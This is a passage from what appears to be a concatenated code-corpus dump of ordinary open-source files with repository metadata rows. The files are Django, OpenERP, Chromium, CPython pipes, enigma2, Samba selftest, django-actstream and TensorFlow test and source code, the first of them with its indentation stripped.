self.assertEqual(repr(d), "{1: 'one', 0: 'zero', 2: 'two'}")
def test_pickle(self):
self.assertEqual(
pickle.loads(pickle.dumps(self.d1, 2)),
{7: 'seven', 1: 'one', 9: 'nine'}
)
def test_copy(self):
orig = SortedDict(((1, "one"), (0, "zero"), (2, "two")))
copied = copy.copy(orig)
self.assertEqual(list(six.iterkeys(orig)), [1, 0, 2])
self.assertEqual(list(six.iterkeys(copied)), [1, 0, 2])
def test_clear(self):
self.d1.clear()
self.assertEqual(self.d1, {})
self.assertEqual(self.d1.keyOrder, [])
def test_insert(self):
d = SortedDict()
with warnings.catch_warnings(record=True) as w:
warnings.simplefilter("always")
d.insert(0, "hello", "world")
assert w[0].category is PendingDeprecationWarning
def test_value_for_index(self):
d = SortedDict({"a": 3})
with warnings.catch_warnings(record=True) as w:
warnings.simplefilter("always")
self.assertEqual(d.value_for_index(0), 3)
assert w[0].category is PendingDeprecationWarning
class MergeDictTests(SimpleTestCase):
def test_simple_mergedict(self):
d1 = {'chris':'cool', 'camri':'cute', 'cotton':'adorable',
'tulip':'snuggable', 'twoofme':'firstone'}
d2 = {'chris2':'cool2', 'camri2':'cute2', 'cotton2':'adorable2',
'tulip2':'snuggable2'}
d3 = {'chris3':'cool3', 'camri3':'cute3', 'cotton3':'adorable3',
'tulip3':'snuggable3'}
d4 = {'twoofme': 'secondone'}
md = MergeDict(d1, d2, d3)
self.assertEqual(md['chris'], 'cool')
self.assertEqual(md['camri'], 'cute')
self.assertEqual(md['twoofme'], 'firstone')
md2 = md.copy()
self.assertEqual(md2['chris'], 'cool')
def test_mergedict_merges_multivaluedict(self):
""" MergeDict can merge MultiValueDicts """
multi1 = MultiValueDict({'key1': ['value1'],
'key2': ['value2', 'value3']})
multi2 = MultiValueDict({'key2': ['value4'],
'key4': ['value5', 'value6']})
mm = MergeDict(multi1, multi2)
# Although 'key2' appears in both dictionaries,
# only the first value is used.
self.assertEqual(mm.getlist('key2'), ['value2', 'value3'])
self.assertEqual(mm.getlist('key4'), ['value5', 'value6'])
self.assertEqual(mm.getlist('undefined'), [])
self.assertEqual(sorted(six.iterkeys(mm)), ['key1', 'key2', 'key4'])
self.assertEqual(len(list(six.itervalues(mm))), 3)
self.assertTrue('value1' in six.itervalues(mm))
self.assertEqual(sorted(six.iteritems(mm), key=lambda k: k[0]),
[('key1', 'value1'), ('key2', 'value3'),
('key4', 'value6')])
self.assertEqual([(k,mm.getlist(k)) for k in sorted(mm)],
[('key1', ['value1']),
('key2', ['value2', 'value3']),
('key4', ['value5', 'value6'])])
class MultiValueDictTests(SimpleTestCase):
def test_multivaluedict(self):
d = MultiValueDict({'name': ['Adrian', 'Simon'],
'position': ['Developer']})
self.assertEqual(d['name'], 'Simon')
self.assertEqual(d.get('name'), 'Simon')
self.assertEqual(d.getlist('name'), ['Adrian', 'Simon'])
self.assertEqual(list(six.iteritems(d)),
[('position', 'Developer'), ('name', 'Simon')])
self.assertEqual(list(six.iterlists(d)),
[('position', ['Developer']),
('name', ['Adrian', 'Simon'])])
# MultiValueDictKeyError: "Key 'lastname' not found in
# <MultiValueDict: {'position': ['Developer'],
# 'name': ['Adrian', 'Simon']}>"
self.assertRaisesMessage(MultiValueDictKeyError,
'"Key \'lastname\' not found in <MultiValueDict: {\'position\':'\
' [\'Developer\'], \'name\': [\'Adrian\', \'Simon\']}>"',
d.__getitem__, 'lastname')
self.assertEqual(d.get('lastname'), None)
self.assertEqual(d.get('lastname', 'nonexistent'), 'nonexistent')
self.assertEqual(d.getlist('lastname'), [])
self.assertEqual(d.getlist('doesnotexist', ['Adrian', 'Simon']),
['Adrian', 'Simon'])
d.setlist('lastname', ['Holovaty', 'Willison'])
self.assertEqual(d.getlist('lastname'), ['Holovaty', 'Willison'])
self.assertEqual(list(six.itervalues(d)),
['Developer', 'Simon', 'Willison'])
def test_appendlist(self):
d = MultiValueDict()
d.appendlist('name', 'Adrian')
d.appendlist('name', 'Simon')
self.assertEqual(d.getlist('name'), ['Adrian', 'Simon'])
def test_copy(self):
for copy_func in [copy.copy, lambda d: d.copy()]:
d1 = MultiValueDict({
"developers": ["Carl", "Fred"]
})
self.assertEqual(d1["developers"], "Fred")
d2 = copy_func(d1)
d2.update({"developers": "Groucho"})
self.assertEqual(d2["developers"], "Groucho")
self.assertEqual(d1["developers"], "Fred")
d1 = MultiValueDict({
"key": [[]]
})
self.assertEqual(d1["key"], [])
d2 = copy_func(d1)
d2["key"].append("Penguin")
self.assertEqual(d1["key"], ["Penguin"])
self.assertEqual(d2["key"], ["Penguin"])
def test_dict_translation(self):
mvd = MultiValueDict({
'devs': ['Bob', 'Joe'],
'pm': ['Rory'],
})
d = mvd.dict()
self.assertEqual(list(six.iterkeys(d)), list(six.iterkeys(mvd)))
for key in six.iterkeys(mvd):
self.assertEqual(d[key], mvd[key])
self.assertEqual({}, MultiValueDict().dict())
class ImmutableListTests(SimpleTestCase):
def test_sort(self):
d = ImmutableList(range(10))
# AttributeError: ImmutableList object is immutable.
self.assertRaisesMessage(AttributeError,
'ImmutableList object is immutable.', d.sort)
self.assertEqual(repr(d), '(0, 1, 2, 3, 4, 5, 6, 7, 8, 9)')
def test_custom_warning(self):
d = ImmutableList(range(10), warning="Object is immutable!")
self.assertEqual(d[1], 1)
# AttributeError: Object is immutable!
self.assertRaisesMessage(AttributeError,
'Object is immutable!', d.__setitem__, 1, 'test')
class DictWrapperTests(SimpleTestCase):
def test_dictwrapper(self):
f = lambda x: "*%s" % x
d = DictWrapper({'a': 'a'}, f, 'xx_')
self.assertEqual("Normal: %(a)s. Modified: %(xx_a)s" % d,
'Normal: a. Modified: *a')
| bsd-3-clause | -565,376,974,323,611,140 | 34.45515 | 95 | 0.545352 | false |
willharris/django | tests/sites_framework/migrations/0001_initial.py | 99 | 1649 | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('sites', '0001_initial'),
]
operations = [
migrations.CreateModel(
name='CustomArticle',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('title', models.CharField(max_length=50)),
('places_this_article_should_appear', models.ForeignKey(to='sites.Site')),
],
options={
'abstract': False,
},
bases=(models.Model,),
),
migrations.CreateModel(
name='ExclusiveArticle',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('title', models.CharField(max_length=50)),
('site', models.ForeignKey(to='sites.Site')),
],
options={
'abstract': False,
},
bases=(models.Model,),
),
migrations.CreateModel(
name='SyndicatedArticle',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('title', models.CharField(max_length=50)),
('sites', models.ManyToManyField(to='sites.Site')),
],
options={
'abstract': False,
},
bases=(models.Model,),
),
]
| bsd-3-clause | -12,916,931,738,349,056 | 31.98 | 114 | 0.502729 | false |
colinligertwood/odoo | addons/account_sequence/account_sequence_installer.py | 39 | 3904 | # -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2004-2010 Tiny SPRL (<http://tiny.be>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
from openerp.osv import fields, osv
class account_sequence_installer(osv.osv_memory):
_name = 'account.sequence.installer'
_inherit = 'res.config.installer'
_columns = {
'name': fields.char('Name',size=64, required=True),
'prefix': fields.char('Prefix',size=64, help="Prefix value of the record for the sequence"),
'suffix': fields.char('Suffix',size=64, help="Suffix value of the record for the sequence"),
'number_next': fields.integer('Next Number', required=True, help="Next number of this sequence"),
'number_increment': fields.integer('Increment Number', required=True, help="The next number of the sequence will be incremented by this number"),
'padding' : fields.integer('Number padding', required=True, help="OpenERP will automatically adds some '0' on the left of the 'Next Number' to get the required padding size."),
'company_id': fields.many2one('res.company', 'Company'),
}
_defaults = {
'company_id': lambda s,cr,uid,c: s.pool.get('res.company')._company_default_get(cr, uid, 'ir.sequence', context=c),
'number_increment': 1,
'number_next': 1,
'padding' : 0,
'name': 'Internal Sequence Journal',
}
def execute(self, cr, uid, ids, context=None):
if context is None:
context = {}
record = self.browse(cr, uid, ids, context=context)[0]
j_ids = []
if record.company_id:
company_id = record.company_id.id,
search_criteria = [('company_id', '=', company_id)]
else:
company_id = False
search_criteria = []
vals = {
'id': 'internal_sequence_journal',
'code': 'account.journal',
'name': record.name,
'prefix': record.prefix,
'suffix': record.suffix,
'number_next': record.number_next,
'number_increment': record.number_increment,
'padding' : record.padding,
'company_id': company_id,
}
obj_sequence = self.pool.get('ir.sequence')
ir_seq = obj_sequence.create(cr, uid, vals, context)
res = super(account_sequence_installer, self).execute(cr, uid, ids, context=context)
jou_obj = self.pool.get('account.journal')
journal_ids = jou_obj.search(cr, uid, search_criteria, context=context)
for journal in jou_obj.browse(cr, uid, journal_ids, context=context):
if not journal.internal_sequence_id:
j_ids.append(journal.id)
if j_ids:
jou_obj.write(cr, uid, j_ids, {'internal_sequence_id': ir_seq})
ir_values_obj = self.pool.get('ir.values')
ir_values_obj.set(cr, uid, key='default', key2=False, name='internal_sequence_id', models =[('account.journal', False)], value=ir_seq)
return res
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
| agpl-3.0 | 5,997,102,660,266,903,000 | 46.036145 | 184 | 0.604252 | false |
sudosurootdev/external_chromium_org | tools/auto_bisect/PRESUBMIT.py | 25 | 3243 | # Copyright (c) 2013 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""Top-level presubmit script for auto-bisect.
See http://dev.chromium.org/developers/how-tos/depottools/presubmit-scripts for
details on the presubmit API.
"""
import imp
import subprocess
import os
# Paths to bisect config files relative to src/tools.
CONFIG_FILES = [
'auto_bisect/config.cfg',
'run-perf-test.cfg'
]
def CheckChangeOnUpload(input_api, output_api):
return _CommonChecks(input_api, output_api)
def CheckChangeOnCommit(input_api, output_api):
return _CommonChecks(input_api, output_api)
def _CommonChecks(input_api, output_api):
"""Does all presubmit checks for auto-bisect."""
results = []
results.extend(_CheckAllConfigFiles(input_api, output_api))
results.extend(_RunUnitTests(input_api, output_api))
results.extend(_RunPyLint(input_api, output_api))
return results
def _CheckAllConfigFiles(input_api, output_api):
"""Checks all bisect config files and returns a list of presubmit results."""
results = []
for f in input_api.AffectedFiles():
for config_file in CONFIG_FILES:
if f.LocalPath().endswith(config_file):
results.extend(_CheckConfigFile(config_file, output_api))
return results
def _CheckConfigFile(file_path, output_api):
"""Checks one bisect config file and returns a list of presubmit results."""
try:
config_file = imp.load_source('config', file_path)
except IOError as e:
warning = 'Failed to read config file %s: %s' % (file_path, str(e))
return [output_api.PresubmitError(warning, items=[file_path])]
if not hasattr(config_file.config):
warning = 'Config file has no "config" global variable: %s' % str(e)
return [output_api.PresubmitError(warning, items=[file_path])]
if type(config_file.config) is not dict:
warning = 'Config file "config" global variable is not dict: %s' % str(e)
return [output_api.PresubmitError(warning, items=[file_path])]
for k, v in config_file.config.iteritems():
if v != '':
warning = 'Non-empty value in config dict: %s: %s' % (repr(k), repr(v))
warning += ('\nThe bisection config file should only contain a config '
'dict with empty fields. Changes to this file should not '
'be submitted.')
return [output_api.PresubmitError(warning, items=[file_path])]
return []
def _RunUnitTests(input_api, output_api):
"""Runs unit tests for auto-bisect."""
repo_root = input_api.change.RepositoryRoot()
auto_bisect_dir = os.path.join(repo_root, 'tools', 'auto_bisect')
test_runner = os.path.join(auto_bisect_dir, 'run_tests')
return_code = subprocess.call(['python', test_runner])
if return_code:
message = 'Auto-bisect unit tests did not all pass.'
return [output_api.PresubmitError(message)]
return []
def _RunPyLint(input_api, output_api):
"""Runs unit tests for auto-bisect."""
telemetry_path = os.path.join(
input_api.PresubmitLocalPath(), os.path.pardir, 'telemetry')
tests = input_api.canned_checks.GetPylint(
input_api, output_api, extra_paths_list=[telemetry_path])
return input_api.RunTests(tests)
| bsd-3-clause | -1,022,108,640,698,142,100 | 33.870968 | 79 | 0.699352 | false |
cnsoft/kbengine-cocos2dx | kbe/res/scripts/common/Lib/test/test_pipes.py | 54 | 7175 | import pipes
import os
import string
import unittest
from test.support import TESTFN, run_unittest, unlink, reap_children
if os.name != 'posix':
raise unittest.SkipTest('pipes module only works on posix')
TESTFN2 = TESTFN + "2"
# tr a-z A-Z is not portable, so make the ranges explicit
s_command = 'tr %s %s' % (string.ascii_lowercase, string.ascii_uppercase)
class SimplePipeTests(unittest.TestCase):
def tearDown(self):
for f in (TESTFN, TESTFN2):
unlink(f)
def testSimplePipe1(self):
t = pipes.Template()
t.append(s_command, pipes.STDIN_STDOUT)
f = t.open(TESTFN, 'w')
f.write('hello world #1')
f.close()
with open(TESTFN) as f:
self.assertEqual(f.read(), 'HELLO WORLD #1')
def testSimplePipe2(self):
with open(TESTFN, 'w') as f:
f.write('hello world #2')
t = pipes.Template()
t.append(s_command + ' < $IN > $OUT', pipes.FILEIN_FILEOUT)
t.copy(TESTFN, TESTFN2)
with open(TESTFN2) as f:
self.assertEqual(f.read(), 'HELLO WORLD #2')
def testSimplePipe3(self):
with open(TESTFN, 'w') as f:
f.write('hello world #2')
t = pipes.Template()
t.append(s_command + ' < $IN', pipes.FILEIN_STDOUT)
f = t.open(TESTFN, 'r')
try:
self.assertEqual(f.read(), 'HELLO WORLD #2')
finally:
f.close()
def testEmptyPipeline1(self):
# copy through empty pipe
d = 'empty pipeline test COPY'
with open(TESTFN, 'w') as f:
f.write(d)
with open(TESTFN2, 'w') as f:
f.write('')
t=pipes.Template()
t.copy(TESTFN, TESTFN2)
with open(TESTFN2) as f:
self.assertEqual(f.read(), d)
def testEmptyPipeline2(self):
# read through empty pipe
d = 'empty pipeline test READ'
with open(TESTFN, 'w') as f:
f.write(d)
t=pipes.Template()
f = t.open(TESTFN, 'r')
try:
self.assertEqual(f.read(), d)
finally:
f.close()
def testEmptyPipeline3(self):
# write through empty pipe
d = 'empty pipeline test WRITE'
t = pipes.Template()
with t.open(TESTFN, 'w') as f:
f.write(d)
with open(TESTFN) as f:
self.assertEqual(f.read(), d)
def testQuoting(self):
safeunquoted = string.ascii_letters + string.digits + '@%_-+=:,./'
unicode_sample = '\xe9\xe0\xdf' # e + acute accent, a + grave, sharp s
unsafe = '"`$\\!' + unicode_sample
self.assertEqual(pipes.quote(''), "''")
self.assertEqual(pipes.quote(safeunquoted), safeunquoted)
self.assertEqual(pipes.quote('test file name'), "'test file name'")
for u in unsafe:
self.assertEqual(pipes.quote('test%sname' % u),
"'test%sname'" % u)
for u in unsafe:
self.assertEqual(pipes.quote("test%s'name'" % u),
"'test%s'\"'\"'name'\"'\"''" % u)
def testRepr(self):
t = pipes.Template()
self.assertEqual(repr(t), "<Template instance, steps=[]>")
t.append('tr a-z A-Z', pipes.STDIN_STDOUT)
self.assertEqual(repr(t),
"<Template instance, steps=[('tr a-z A-Z', '--')]>")
def testSetDebug(self):
t = pipes.Template()
t.debug(False)
self.assertEqual(t.debugging, False)
t.debug(True)
self.assertEqual(t.debugging, True)
def testReadOpenSink(self):
# check calling open('r') on a pipe ending with
# a sink raises ValueError
t = pipes.Template()
t.append('boguscmd', pipes.SINK)
self.assertRaises(ValueError, t.open, 'bogusfile', 'r')
def testWriteOpenSource(self):
# check calling open('w') on a pipe ending with
# a source raises ValueError
t = pipes.Template()
t.prepend('boguscmd', pipes.SOURCE)
self.assertRaises(ValueError, t.open, 'bogusfile', 'w')
def testBadAppendOptions(self):
t = pipes.Template()
# try a non-string command
self.assertRaises(TypeError, t.append, 7, pipes.STDIN_STDOUT)
# try a type that isn't recognized
self.assertRaises(ValueError, t.append, 'boguscmd', 'xx')
# shouldn't be able to append a source
self.assertRaises(ValueError, t.append, 'boguscmd', pipes.SOURCE)
# check appending two sinks
t = pipes.Template()
t.append('boguscmd', pipes.SINK)
self.assertRaises(ValueError, t.append, 'boguscmd', pipes.SINK)
# command needing file input but with no $IN
t = pipes.Template()
self.assertRaises(ValueError, t.append, 'boguscmd $OUT',
pipes.FILEIN_FILEOUT)
t = pipes.Template()
self.assertRaises(ValueError, t.append, 'boguscmd',
pipes.FILEIN_STDOUT)
# command needing file output but with no $OUT
t = pipes.Template()
self.assertRaises(ValueError, t.append, 'boguscmd $IN',
pipes.FILEIN_FILEOUT)
t = pipes.Template()
self.assertRaises(ValueError, t.append, 'boguscmd',
pipes.STDIN_FILEOUT)
def testBadPrependOptions(self):
t = pipes.Template()
# try a non-string command
self.assertRaises(TypeError, t.prepend, 7, pipes.STDIN_STDOUT)
# try a type that isn't recognized
self.assertRaises(ValueError, t.prepend, 'tr a-z A-Z', 'xx')
# shouldn't be able to prepend a sink
self.assertRaises(ValueError, t.prepend, 'boguscmd', pipes.SINK)
# check prepending two sources
t = pipes.Template()
t.prepend('boguscmd', pipes.SOURCE)
self.assertRaises(ValueError, t.prepend, 'boguscmd', pipes.SOURCE)
# command needing file input but with no $IN
t = pipes.Template()
self.assertRaises(ValueError, t.prepend, 'boguscmd $OUT',
pipes.FILEIN_FILEOUT)
t = pipes.Template()
self.assertRaises(ValueError, t.prepend, 'boguscmd',
pipes.FILEIN_STDOUT)
# command needing file output but with no $OUT
t = pipes.Template()
self.assertRaises(ValueError, t.prepend, 'boguscmd $IN',
pipes.FILEIN_FILEOUT)
t = pipes.Template()
self.assertRaises(ValueError, t.prepend, 'boguscmd',
pipes.STDIN_FILEOUT)
def testBadOpenMode(self):
t = pipes.Template()
self.assertRaises(ValueError, t.open, 'bogusfile', 'x')
def testClone(self):
t = pipes.Template()
t.append('tr a-z A-Z', pipes.STDIN_STDOUT)
u = t.clone()
self.assertNotEqual(id(t), id(u))
self.assertEqual(t.steps, u.steps)
self.assertNotEqual(id(t.steps), id(u.steps))
self.assertEqual(t.debugging, u.debugging)
def test_main():
run_unittest(SimplePipeTests)
reap_children()
if __name__ == "__main__":
test_main()
| lgpl-3.0 | -6,913,531,561,075,049,000 | 33.004739 | 79 | 0.569338 | false |
schleichdi2/openpli-e2 | lib/python/Components/Converter/ServiceName.py | 24 | 1939 | # -*- coding: utf-8 -*-
from Components.Converter.Converter import Converter
from enigma import iServiceInformation, iPlayableService, iPlayableServicePtr, eServiceReference
from ServiceReference import resolveAlternate
from Components.Element import cached
class ServiceName(Converter, object):
NAME = 0
PROVIDER = 1
REFERENCE = 2
EDITREFERENCE = 3
NUMBER = 4
def __init__(self, type):
Converter.__init__(self, type)
if type == "Provider":
self.type = self.PROVIDER
elif type == "Reference":
self.type = self.REFERENCE
elif type == "EditReference":
self.type = self.EDITREFERENCE
elif type == "Number":
self.type = self.NUMBER
else:
self.type = self.NAME
@cached
def getText(self):
service = self.source.service
if isinstance(service, iPlayableServicePtr):
info = service and service.info()
ref = None
else: # reference
info = service and self.source.info
ref = service
if not info:
return ""
if self.type == self.NAME:
name = ref and info.getName(ref)
if name is None:
name = info.getName()
return name.replace('\xc2\x86', '').replace('\xc2\x87', '')
elif self.type == self.PROVIDER:
return info.getInfoString(iServiceInformation.sProvider)
elif self.type == self.REFERENCE or self.type == self.EDITREFERENCE and hasattr(self.source, "editmode") and self.source.editmode:
if not ref:
return info.getInfoString(iServiceInformation.sServiceref)
nref = resolveAlternate(ref)
if nref:
ref = nref
return ref.toString()
elif self.type == self.NUMBER:
if not ref:
ref = eServiceReference(info.getInfoString(iServiceInformation.sServiceref))
num = ref and ref.getChannelNum() or None
if num is None:
num = '---'
else:
num = str(num)
return num
text = property(getText)
def changed(self, what):
if what[0] != self.CHANGED_SPECIFIC or what[1] in (iPlayableService.evStart,):
Converter.changed(self, what)
| gpl-2.0 | 7,645,101,249,338,529,000 | 27.940299 | 132 | 0.700877 | false |
sYnfo/samba | selftest/target/samba.py | 1 | 4169 | #!/usr/bin/perl
# Bootstrap Samba and run a number of tests against it.
# Copyright (C) 2005-2012 Jelmer Vernooij <[email protected]>
# Published under the GNU GPL, v3 or later.
from __future__ import absolute_import
import os
import sys
def bindir_path(bindir, path):
"""Find the executable to use.
:param bindir: Directory with binaries
:param path: Name of the executable to run
:return: Full path to the executable to run
"""
valpath = os.path.join(bindir, path)
if os.path.isfile(valpath):
return valpath
return path
def mk_realms_stanza(realm, dnsname, domain, kdc_ipv4):
"""Create a realms stanza for use in a krb5.conf file.
:param realm: Real name
:param dnsname: DNS name matching the realm
:param domain: Domain name
:param kdc_ipv4: IPv4 address of the KDC
:return: String with stanza
"""
return """\
%(realm)s = {
kdc = %(kdc_ipv4)s:88
admin_server = %(kdc_ipv4)s:88
default_domain = %(dnsname)s
}
%(dnsname)s = {
kdc = %(kdc_ipv4)s:88
admin_server = %(kdc_ipv4)s:88
default_domain = %(dnsname)s
}
%(domain)s = {
kdc = %(kdc_ipv4)s:88
admin_server = %(kdc_ipv4)s:88
default_domain = %(dnsname)s
}
""" % {
"kdc_ipv4": kdc_ipv4, "dnsname": dnsname, "realm": realm, "domain": domain}
def write_krb5_conf(f, realm, dnsname, domain, kdc_ipv4, tlsdir=None,
other_realms_stanza=None):
"""Write a krb5.conf file.
:param f: File-like object to write to
:param realm: Realm
:param dnsname: DNS domain name
:param domain: Domain name
:param kdc_ipv4: IPv4 address of KDC
:param tlsdir: Optional TLS directory
:param other_realms_stanza: Optional extra raw text for [realms] section
"""
f.write("""\
#Generated krb5.conf for %(realm)s
[libdefaults]
\tdefault_realm = %(realm)s
\tdns_lookup_realm = false
\tdns_lookup_kdc = false
\tticket_lifetime = 24h
\tforwardable = yes
\tallow_weak_crypto = yes
""" % {"realm": realm})
f.write("\n[realms]\n")
f.write(mk_realms_stanza(realm, dnsname, domain, kdc_ipv4))
if other_realms_stanza:
f.write(other_realms_stanza)
if tlsdir:
f.write("""
[appdefaults]
pkinit_anchors = FILE:%(tlsdir)s/ca.pem
[kdc]
enable-pkinit = true
pkinit_identity = FILE:%(tlsdir)s/kdc.pem,%(tlsdir)s/key.pem
pkinit_anchors = FILE:%(tlsdir)s/ca.pem
""" % {"tlsdir": tlsdir})
def cleanup_child(pid, name, outf=None):
"""Cleanup a child process.
:param pid: Parent pid process to be passed to waitpid()
:param name: Name to use when referring to process
:param outf: File-like object to write to (defaults to stderr)
:return: Child pid
"""
if outf is None:
outf = sys.stderr
(childpid, status) = os.waitpid(pid, os.WNOHANG)
if childpid == 0:
pass
elif childpid < 0:
outf.write("%s child process %d isn't here any more.\n" % (name, pid))
return childpid
elif status & 127:
if status & 128:
core_status = 'with'
else:
core_status = 'without'
outf.write("%s child process %d, died with signal %d, %s coredump.\n" % (name, childpid, (status & 127), core_status))
else:
outf.write("%s child process %d exited with value %d.\n" % (name, childpid, status >> 8))
return childpid
def get_interface(netbiosname):
"""Return interface id for a particular server.
"""
netbiosname = netbiosname.lower()
interfaces = {
"localnt4dc2": 2,
"localnt4member3": 3,
"localshare4": 4,
"localserver5": 5,
"localktest6": 6,
"maptoguest": 7,
# 11-16 used by selftest.pl for client interfaces
"localdc": 21,
"localvampiredc": 22,
"s4member": 23,
"localrpcproxy": 24,
"dc5": 25,
"dc6": 26,
"dc7": 27,
"rodc": 28,
"localadmember": 29,
"addc": 30,
"localsubdc": 31,
"chgdcpass": 32,
}
# update lib/socket_wrapper/socket_wrapper.c
# #define MAX_WRAPPED_INTERFACES 32
# if you wish to have more than 32 interfaces
return interfaces[netbiosname]
| gpl-3.0 | -1,059,297,147,391,001,900 | 25.896774 | 126 | 0.618134 | false |
whatsthehubbub/playpilots | ebi/actstream/tests.py | 2 | 4691 | import unittest
from django.db import models
from django.test.client import Client
from django.contrib.auth.models import User, Group
from django.contrib.comments.models import Comment
from django.contrib.contenttypes.models import ContentType
from django.contrib.sites.models import Site
from actstream.signals import action
from actstream.models import Action, Follow, follow, user_stream, model_stream, actor_stream
from testapp.models import Player
class ActivityTestCase(unittest.TestCase):
def setUp(self):
self.group = Group.objects.get_or_create(name='CoolGroup')[0]
self.user1 = User.objects.get_or_create(username='admin')[0]
self.user1.set_password('admin')
self.user1.is_superuser = self.user1.is_active = self.user1.is_staff = True
self.user1.save()
self.user2 = User.objects.get_or_create(username='Two')[0]
# User1 joins group
self.user1.groups.add(self.group)
action.send(self.user1,verb='joined',target=self.group)
# User1 follows User2
follow(self.user1, self.user2)
# User2 joins group
self.user2.groups.add(self.group)
action.send(self.user2,verb='joined',target=self.group)
# User2 follows group
follow(self.user2, self.group)
# User1 comments on group
action.send(self.user1,verb='commented on',target=self.group)
comment = Comment.objects.get_or_create(
user = self.user1,
content_type = ContentType.objects.get_for_model(self.group),
object_pk = self.group.pk,
comment = 'Sweet Group!',
site = Site.objects.get_current()
)[0]
# Group responds to comment
action.send(self.group,verb='responded to',target=comment)
self.client = Client()
def test_user1(self):
self.assertEqual(map(unicode, actor_stream(self.user1)),
[u'admin commented on CoolGroup 0 minutes ago', u'admin started following Two 0 minutes ago', u'admin joined CoolGroup 0 minutes ago'])
def test_user2(self):
self.assertEqual(map(unicode, actor_stream(self.user2)),
[u'Two started following CoolGroup 0 minutes ago', u'Two joined CoolGroup 0 minutes ago'])
def test_group(self):
self.assertEqual(map(unicode, actor_stream(self.group)),
[u'CoolGroup responded to admin: Sweet Group!... 0 minutes ago'])
def test_stream(self):
self.assertEqual(map(unicode, user_stream(self.user1)),
[u'Two started following CoolGroup 0 minutes ago', u'Two joined CoolGroup 0 minutes ago'])
self.assertEqual(map(unicode, user_stream(self.user2)),
[u'CoolGroup responded to admin: Sweet Group!... 0 minutes ago'])
def test_rss(self):
rss = self.client.get('/feed/').content
self.assert_(rss.startswith('<?xml version="1.0" encoding="utf-8"?>\n<rss xmlns:atom="http://www.w3.org/2005/Atom" version="2.0">'))
self.assert_(rss.find('Activity feed for your followed actors')>-1)
def test_atom(self):
atom = self.client.get('/feed/atom/').content
self.assert_(atom.startswith('<?xml version="1.0" encoding="utf-8"?>\n<feed xmlns="http://www.w3.org/2005/Atom" xml:lang="en-us">'))
self.assert_(atom.find('Activity feed for your followed actors')>-1)
def test_zombies(self):
from random import choice, randint
humans = [Player.objects.create() for i in range(10)]
zombies = [Player.objects.create(state=1) for _ in range(2)]
while len(humans):
for z in zombies:
if not len(humans): break
victim = choice(humans)
humans.pop(humans.index(victim))
victim.state = 1
victim.save()
zombies.append(victim)
action.send(z,verb='killed',target=victim)
self.assertEqual(map(unicode,model_stream(Player))[:5],
map(unicode,Action.objects.order_by('-timestamp')[:5]))
def tearDown(self):
from django.core.serializers import serialize
for i,m in enumerate((Comment,ContentType,Player,Follow,Action,User,Group)):
f = open('testdata%d.json'%i,'w')
f.write(serialize('json',m.objects.all()))
f.close()
Action.objects.all().delete()
Comment.objects.all().delete()
Player.objects.all().delete()
User.objects.all().delete()
Group.objects.all().delete()
Follow.objects.all().delete()
| mit | 902,271,589,175,147,500 | 42.036697 | 147 | 0.617566 | false |
ryfeus/lambda-packs | Tensorflow/source/tensorflow/contrib/boosted_trees/python/ops/stats_accumulator_ops.py | 62 | 9211 | # Copyright 2017 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Stats Accumulator ops python wrappers."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import re
from tensorflow.contrib.boosted_trees.python.ops import batch_ops_utils
# pylint: disable=unused-import
from tensorflow.contrib.boosted_trees.python.ops import boosted_trees_ops_loader
# pylint: enable=unused-import
from tensorflow.contrib.boosted_trees.python.ops import gen_stats_accumulator_ops
from tensorflow.python.framework import ops
from tensorflow.python.framework import tensor_shape
from tensorflow.python.ops import resources
from tensorflow.python.training import saver
# Pattern to remove all non alpha numeric from a string.
_PATTERN = re.compile(r"[\W_]+")
class StatsAccumulator(saver.BaseSaverBuilder.SaveableObject):
"""A resource that allows to accumulate gradients and hessians.
For consistency guarantees, we use read and write stamp tokens.
The stamp token on the resource is updated with StatsAccumulator.flush.
Calls to StatsAccumulator.add that don't provide the current stamp token are
ignored.
"""
def __init__(self,
stamp_token,
gradient_shape,
hessian_shape,
name=None,
container=None):
"""Creates a stats accumulator and returns a handle to it.
Args:
stamp_token: An int64, initial value to use for the stamp token.
gradient_shape: A TensorShape, containing shape of gradients.
hessian_shape: A TensorShape, containing shape of hessians.
name: A name for the stats accumulator variable.
container: An optional `string`. Defaults to `""`.
Returns:
A `Tensor` of type mutable `string`. The handle to the stats accumulator.
"""
if name is not None:
name = _PATTERN.sub("", name)
with ops.name_scope(name, "StatsAccumulator") as name:
# Both values are scalars.
if (gradient_shape == tensor_shape.scalar() and
hessian_shape == tensor_shape.scalar()):
self._is_scalar = True
self._resource_handle = (gen_stats_accumulator_ops.
stats_accumulator_scalar_resource_handle_op(
container, name, name=name))
create_op = gen_stats_accumulator_ops.create_stats_accumulator_scalar(
self._resource_handle, stamp_token)
is_initialized_op = (
gen_stats_accumulator_ops.stats_accumulator_scalar_is_initialized(
self._resource_handle))
else:
self._is_scalar = False
self._resource_handle = (gen_stats_accumulator_ops.
stats_accumulator_tensor_resource_handle_op(
container, name, name=name))
create_op = gen_stats_accumulator_ops.create_stats_accumulator_tensor(
